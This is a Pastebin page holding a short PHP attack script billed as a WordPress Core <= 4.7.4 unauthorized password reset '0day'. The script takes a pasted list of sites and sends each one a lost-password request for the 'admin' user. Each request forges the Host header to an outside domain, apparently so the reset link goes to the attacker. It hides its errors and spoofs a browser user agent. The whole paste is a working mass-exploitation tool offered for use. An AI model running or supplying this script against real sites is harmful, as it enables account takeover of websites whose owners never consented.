API tools faq
paste
Advertisement
AZZATSSINS_CYBERSERK

WordPress Core <= 4.7.4 Potential Unauthorized Password Rese

AZZATSSINS_CYBERSERK
Jun 13th, 2017
445
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.07 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. @ini_set('output_buffering',0);
  4. @ini_set('display_errors', 0);
  5. /*AUTHOR : AZZATSSINS*/
  6. echo "<title>Wordpress Reset Pass</title><center><u>WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day)</u><br><form method='post'><textarea name='sites'></textarea><br><input type='submit' name='go' value='Submit'></form><br>";
  7. if($_POST['go']) {
  8. $sites = explode("\r\n", $_POST['sites']);
  9. foreach($sites as $site) {
  10. $header = array("Host: ber5erk.co.uk","Content-Type: application/x-www-form-urlencoded","Content-Length: 56");
  11. $azzatssins = $site."/wp-login.php?action=lostpassword";
  12. $ch = curl_init("$azzatssins");
  13. curl_setopt($ch, CURLOPT_POST, true);
  14. curl_setopt($ch, CURLOPT_USERAGENT,
  15. "Mozilla/5.0 (Windows NT 6.3; WOW64)
  16. AppleWebKit/537.36 (KHTML, like Gecko)
  17. Chrome/43.0.2357.124 Safari/537.36");
  18. curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
  19. curl_setopt($ch, CURLOPT_POSTFIELDS, "user_login=admin&redirect_to=&wp-submit=Get+New+Password");
  20. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  21. $result = curl_exec($ch);
  22. curl_close($ch);
  23. }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!